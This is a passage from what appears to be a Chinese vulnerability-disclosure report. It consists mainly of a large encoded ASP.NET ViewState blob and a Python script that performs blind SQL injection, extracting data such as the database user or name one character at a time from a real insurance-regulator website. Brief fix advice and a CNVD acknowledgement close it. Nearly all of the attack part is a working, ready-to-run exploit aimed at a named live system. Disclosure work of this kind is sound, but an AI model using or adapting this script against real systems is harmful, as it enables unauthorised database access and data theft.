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aIluiAhemHjeaWsOWItuS9nOetieWkhOeQhuOAgiA8L2xpPg0KICAgIDxsaT7kv6Horr/mipXor4njgIHlu4nmlL/kuL7miqXjgIHkuJrliqHlkqjor6LjgIHmhI/op4Hlu7rorq7nrYnkuovpobnkuI3lsZ7kuo7kvp3nlLPor7flhazlvIDmlL/lupzkv6Hmga/ojIPlm7TjgILmjInnhafigJzkuIDkuovkuIDnlLPor7figJ3ljp/liJnmj5Dlh7rnlLPor7fjgILnlLPor7fkurrouqvku73jgIHogZTns7vmlrnlvI/nrYnkuovpobnlv4XpobvnnJ/lrp7mnInmlYjjgIIgPC9saT4NCjwvdWw+DQo8cCBzdHlsZT0ibGluZS1oZWlnaHQ6IDIwcHg7Ij7lpoLmnKzns7vnu5/ml6Dms5Xmu6HotrPmgqjnmoTnlLPor7fpnIDmsYLvvIzor7fpgJrov4fkuabpnaLmlrnlvI/mj5Dlh7rnlLPor7fjgILmgqjlj6/ku6XkuIvovb3jgIrkuK3lm73kv53nm5HkvJrmlL/lupzkv6Hmga/lhazlvIDnlLPor7fooajjgIvvvIzlubbmjInopoHmsYLloavlhpnvvIzpgJrov4fkv6Hlh73mlrnlvI/pgq7lr4Toh7PkuK3lm73kv53nm5HkvJrlip7lhazljoXvvIzlubbor7flnKjkv6HlsIHlt6bkuIvop5Lms6jmmI7igJzmlL/lupzkv6Hmga/lhazlvIDnlLPor7figJ3lrZfmoLfjgII8L3A+DQo8cCBzdHlsZT0ibGluZS1oZWlnaHQ6IDIwcHg7Ij4mbmJzcDs8L3A+DQo8cCBzdHlsZT0ibGluZS1oZWlnaHQ6IDIwcHg7Ij4mbmJzcDsmbmJzcDsg6ZO+5o6l77yaPGEgaHJlZj0iL1BvcnRhbHMvMC9hdHRhY2htZW50cy/kuK3lm73kv53nm5HkvJrmlL/lupzkv6Hmga/lhazlvIDnlLPor7fooaguZG9jeCI+44CK5Lit5Zu95L+d55uR5Lya5pS/5bqc5L+h5oGv5YWs5byA55Sz6K+36KGo44CLPC9hPiA8L3A+DQo8c3R5bGU+DQogICAgLnVsQXBwbHlGb3JQdWJsaWN7bWFyZ2luLWxlZnQ6MjVweDtsaW5lLWhlaWdodDoyMHB4O30NCiAgICAudWxBcHBseUZvclB1YmxpYyBsaXtsaXN0LXN0eWxlLXR5cGU6IGRpc2M7fQ0KPC9zdHlsZT5kAgIPFgIfAWcWCAIDDxBkEBUEDS0t6K+36YCJ5oupLS0J5b6F5a6h5qC4CeWuoeaguOS4rQnlt7LlrqHmoLgVBAItMQExATIBMxQrAwRnZ2dnZGQCBg8PFgIfAAUG5YWs5byAZGQCBw88KwALAQAPFhAfDwICHxACAh8RAgIfEhYAHxMCAR4MU3FsVGFibGVOYW1lBQ5BcHBseUZvclB1YmxpYx8UAgIfFQUrIENyZWF0ZUlEID04NDIwNCBhbmQgUG9ydGFsSUQ9MCBhbmQgSXNEZWw9MGQWAmYPZBYIAgEPZBYCZg9kFgICAQ8WAh8BZ2QCAg9kFg5mD2QWCAIBDxYCHgV2YWx1ZQUEMTI1OWQCAw8PFgIfAAUBMWRkAgUPDxYCHwAFBGhvc3RkZAIHDw8WAh8ABQQxMjU5ZGQCAQ9kFgICAQ8PFgIfFwUgL3RhYmlkLzY1NDcvSUQvMTI1OS9EZWZhdWx0LmFzcHhkFgJmDxUBCDIwMTUxMzc2ZAICDw8WAh8ABSHkuK3lm73kv53pmannm5HnnaPnrqHnkIblp5TlkZjkvJpkZAIDD2QWAgIBDw8WAh8ABQbkvanlhoVkZAIED2QWAgIBDw8WBB8ABQV1bmlvbh8IBQV1bmlvbmRkAgUPDxYCHwAFEzIwMTUtMDgtMTAgMTk6NDg6NTZkZAIGD2QWBAIBDw8WAh8XBSAvdGFiaWQvNjU0Ny9JRC8xMjU5L0RlZmF1bHQuYXNweGRkAgMPDxYCHwAFCeW3suWuoeaguGRkAgMPZBYOZg9kFggCAQ8WAh8cBQQxMjUzZAIDDw8WAh8ABQEyZGQCBQ8PFgIfAAUIYWRtaW4xMjNkZAIHDw8WAh8ABQQxMjUzZGQCAQ9kFgICAQ8PFgIfFwUgL3RhYmlkLzY1NDcvSUQvMTI1My9EZWZhdWx0LmFzcHhkFgJmDxUBCDIwMTUxMzY4ZAICDw8WAh8ABSHkuK3lm73kv53pmannm5HnnaPnrqHnkIblp5TlkZjkvJpkZAIDD2QWAgIBDw8WAh8ABQboo7TlhoVkZAIED2QWAgIBDw8WBB8ABQYxMjNhc2QfCAUGMTIzYXNkZGQCBQ8PFgIfAAUTMjAxNS0wOC0xMCAxNDozODowMGRkAgYPZBYEAgEPDxYCHxcFIC90YWJpZC82NTQ3L0lELzEyNTMvRGVmYXVsdC5hc3B4ZGQCAw8PFgIfAAUJ5bey5a6h5qC4ZGQCBQ9kFgRmDw9kFgIfGAUBMmQCAQ8PFgIfGQIFZGQCCA9kFg4CAQ8PFgIfAAUz5oC75pWwOjJb5q+P6aG1MTDmnaHnm65dLDxmb250IGNvbG9yPXJlZD4xPC9mb250Pi8xZGQCAw8PFgIfGmhkZAIFDw8WAh8aaGRkAgcPDxYCHxpoZGQCCQ8PFgIfGmhkZAILDw8WAh8aaGRkAg8PDxYCHxpoZGQCCg88KwAJAgAPFgYfCmQfC2QfDAIcZAgUKwAKBSMwOjAsMDoxLDA6MiwwOjMsMDo0LDA6NSwwOjYsMDo3LDA6OBQrAAIWBh8ABWo8YSB0aXRsZT0n5qaC5Ya1566A5LuLJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5qaC5Ya1566A5LuLPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oNyk8L3NwYW4+Hw0FATEfDmgUKwADBQcwOjAsMDoxFCsAAhYGHwAFajxhIHRpdGxlPSfmnLrmnoTnroDku4snIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7mnLrmnoTnroDku4s8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigxKTwvc3Bhbj4fDQUCMTAfDmhkFCsAAhYGHwAFajxhIHRpdGxlPSfpooblr7znroDku4snIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7pooblr7znroDku4s8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPig2KTwvc3Bhbj4fDQUCMTEfDmhkFCsAAhYGHwAFazxhIHRpdGxlPSflj5HlsZXop4TliJInIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7lj5HlsZXop4TliJI8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigxOSk8L3NwYW4+Hw0FATIfDmhkFCsAAhYGHwAFbTxhIHRpdGxlPSflt6XkvZzliqjmgIEnIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7lt6XkvZzliqjmgIE8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigyMTk3KTwvc3Bhbj4fDQUBMx8OaBQrAAUFDzA6MCwwOjEsMDoyLDA6MxQrAAIWBh8ABW08YSB0aXRsZT0n55uR566h5Yqo5oCBJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+55uR566h5Yqo5oCBPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMTA4MSk8L3NwYW4+Hw0FAjMwHw5oZBQrAAIWBh8ABWw8YSB0aXRsZT0n5YWs5ZGK6YCa55+lJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5YWs5ZGK6YCa55+lPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oOTAxKTwvc3Bhbj4fDQUCMzEfDmhkFCsAAhYGHwAFazxhIHRpdGxlPSfkurrkuovku7vlhY0nIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7kurrkuovku7vlhY08L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPig1Nyk8L3NwYW4+Hw0FAjMyHw5oZBQrAAIWBh8ABWw8YSB0aXRsZT0n5Lq65ZGY5oub5b2VJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5Lq65ZGY5oub5b2VPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMTU4KTwvc3Bhbj4fDQUCMzMfDmhkFCsAAhYGHwAFbTxhIHRpdGxlPSfooYzmlL/op4TojIMnIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7ooYzmlL/op4TojIM8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigxMDk5KTwvc3Bhbj4fDQUBNB8OaBQrAAQFCzA6MCwwOjEsMDoyFCsAAhYGHwAFazxhIHRpdGxlPSfpg6jpl6jop4Tnq6AnIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7pg6jpl6jop4Tnq6A8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPig4OCk8L3NwYW4+Hw0FAjQwHw5oZBQrAAIWBh8ABXI8YSB0aXRsZT0n6KeE6IyD5oCn5paH5Lu2JyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+6KeE6IyD5oCn5paH5Lu2PC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oODU3KTwvc3Bhbj4fDQUCNDEfDmhkFCsAAhYGHwAFbDxhIHRpdGxlPSflhbbku5bms5Xop4QnIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7lhbbku5bms5Xop4Q8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigxNTQpPC9zcGFuPh8NBQI0Mh8OaGQUKwACFgYfAAVuPGEgdGl0bGU9J+ihjOaUv+iuuOWPrycgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuihjOaUv+iuuOWPrzwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDEyMzU0KTwvc3Bhbj4fDQUBNR8OaBQrAAMFBzA6MCwwOjEUKwACFgYfAAV3PGEgdGl0bGU9J+ihjOaUv+iuuOWPr+aMh+WNlycgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuihjOaUv+iuuOWPr+aMh+WNlzwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDYzKTwvc3Bhbj4fDQUCNTAfDmhkFCsAAhYGHwAFhgE8YSB0aXRsZT0n6KGM5pS/6K645Y+v57uT5p6c5YWs5biDJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+6KGM5pS/6K645Y+v57uT5p6c5YWs5biDPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMTIyOTEpPC9zcGFuPh8NBQI1MR8OaGQUKwACFgYfAAVsPGEgdGl0bGU9J+ihjOaUv+aJp+azlScgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuihjOaUv+aJp+azlTwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDE1OSk8L3NwYW4+Hw0FATYfDmgUKwADBQcwOjAsMDoxFCsAAhYGHwAFbDxhIHRpdGxlPSfooYzmlL/lpITnvZonIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7ooYzmlL/lpITnvZo8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigxMTMpPC9zcGFuPh8NBQI2MB8OaGQUKwACFgYfAAVlPGEgdGl0bGU9J+ebkeeuoeWHvScgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuebkeeuoeWHvTwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDQ2KTwvc3Bhbj4fDQUCNjEfDmhkFCsAAhYGHwAFbDxhIHRpdGxlPSfnu5/orqHkv6Hmga8nIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7nu5/orqHkv6Hmga88L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPigzODApPC9zcGFuPh8NBQE3Hw5oFCsABwUXMDowLDA6MSwwOjIsMDozLDA6NCwwOjUUKwACFgYfAAV+PGEgdGl0bGU9J+S/nemZqeS4mue7j+iQpeaDheWGtScgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuS/nemZqeS4mue7j+iQpeaDheWGtTwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDE5Nyk8L3NwYW4+Hw0FAjcwHw5oZBQrAAIWBh8ABZUBPGEgdGl0bGU9J+i0ouS6p+mZqeWFrOWPuOS/nei0ueaUtuWFpeaDheWGtScgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPui0ouS6p+mZqeWFrOWPuOS/nei0ueaUtuWFpeaDheWGtTwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDE4KTwvc3Bhbj4fDQUCNzEfDmhkFCsAAhYGHwAFlQE8YSB0aXRsZT0n5Lq66Lqr6Zmp5YWs5Y+45L+d6LS55pS25YWl5oOF5Ya1JyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5Lq66Lqr6Zmp5YWs5Y+45L+d6LS55pS25YWl5oOF5Ya1PC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMTkpPC9zcGFuPh8NBQI3Mh8OaGQUKwACFgYfAAWgATxhIHRpdGxlPSflhbvogIHpmanlhazlj7jkvIHkuJrlubTph5HkuJrliqHmg4XlhrUnIG9uY2xpY2s9Ik1lbnUodGhpcywn5Li76aKYLScpIj7lhbvogIHpmanlhazlj7jkvIHkuJrlubTph5HkuJrliqHmg4XlhrU8L2E+PHNwYW4gc3R5bGU9J2NvbG9yOnJlZDsnPig2KTwvc3Bhbj4fDQUCNzMfDmhkFCsAAhYGHwAFlgE8YSB0aXRsZT0n5YWo5Zu95ZCE5Zyw5Yy65L+d6LS55pS25YWl5oOF5Ya1JyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5YWo5Zu95ZCE5Zyw5Yy65L+d6LS55pS25YWl5oOF5Ya1PC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMTEzKTwvc3Bhbj4fDQUCNzQfDmhkFCsAAhYGHwAFgwE8YSB0aXRsZT0n5L+d6Zmp57uf6K6h5pWw5o2u5oql5ZGKJyBvbmNsaWNrPSJNZW51KHRoaXMsJ+S4u+mimC0nKSI+5L+d6Zmp57uf6K6h5pWw5o2u5oql5ZGKPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpyZWQ7Jz4oMjcpPC9zcGFuPh8NBQI3NR8OaGQUKwACFgYfAAVqPGEgdGl0bGU9J+WKnuS6i+aMh+WNlycgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuWKnuS6i+aMh+WNlzwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDgpPC9zcGFuPh8NBQIxMB8OaGQUKwACFgYfAAVePGEgdGl0bGU9J+WFtuS7licgb25jbGljaz0iTWVudSh0aGlzLCfkuLvpopgtJykiPuWFtuS7ljwvYT48c3BhbiBzdHlsZT0nY29sb3I6cmVkOyc+KDgpPC9zcGFuPh8NBQIxMx8OaGRkAgUPFgIfBwUTdG9uZ2ppIEVTU0VtcHR5UGFuZWQCDA8UKwACFCsAA2RkZGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBSBlc3MkY3RyMjQ0MzckYmpoX01lbnUkaWJ0blNlYXJjaAU5ZXNzJGN0cjI0NDM3JGJqaF9NZW51JGdyZEFwcGx5Rm9yUHVibGljJGN0bDAyJGNoa0FsbEluQm94BSxlc3MkY3RyMjQ0MzckYmpoX01lbnUkdHJHdWlkZVN1YmplY3RDbGFzc2lmeQ=="""
#其实把这一坨写在其他文件里,就不会这么恶心了。。
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+=-<>,./?;:[]{}\|')
print('CIRC mssql injection begins now!')
target = raw_input('What do you want to know?("user_name()", "db_name()"):') #有没有很贴心~
result = ''
for i in range(1, 15): #事先要用len()试出来要查询内容的长度,其实可以自动化,懒得写了。。
	for payload in payloads:
		queryinfo = "%%' and ascii(substring((select %s),%s,1))=%s--" % (target, i, ord(payload))
		body="""\r\n\r\n-----------------------------4007811431419953409171175952\r\nContent-Disposition: form-data; name="__VIEWSTATE"\r\n\r\n""" + viewstate + """\r\n-----------------------------4007811431419953409171175952\r\nContent-Disposition: form-data; name="ess$ctr24437$bjh_Menu$txtNeedOtherInfo"\r\n\r\n""" + queryinfo + """\r\n-----------------------------4007811431419953409171175952\r\nContent-Disposition: form-data; name="ess$ctr24437$bjh_Menu$ibtnSearch.x"\r\n\r\n1\r\n-----------------------------4007811431419953409171175952\r\nContent-Disposition: form-data; name="ess$ctr24437$bjh_Menu$ibtnSearch.y"\r\n\r\n1\r\n-----------------------------4007811431419953409171175952\r\nContent-Disposition: form-data; name="ess$ctr24437$bjh_Menu$hidType"\r\n\r\n公开\r\n-----------------------------4007811431419953409171175952--\r\n"""
		req=urllib2.Request('http://www.circ.gov.cn/tabid/5272/Default.aspx', data=body)
		req.add_header('Content-Type','multipart/form-data;boundary=---------------------------4007811431419953409171175952')
		req.add_header('Cookie',mycookie)
		resp = urllib2.urlopen(req,timeout=5)
		respstr = resp.read()
		if respstr.find('123asd') != -1:
			result += payload
			sys.stdout.write('\r\n[Guessing] %s' % result)
			sys.stdout.flush()
			break
print('\r\n[Succeed]The result is: '+result)


漏洞证明:

见详细说明。

修复方案:

1、过滤特殊字符;
2、参数化查询;
3、VIEWSTATE里那个SQL语句总感觉不好,泄露了列名,看看能不能删掉?

版权声明:转载请注明来源 Zacker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-14 17:55

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无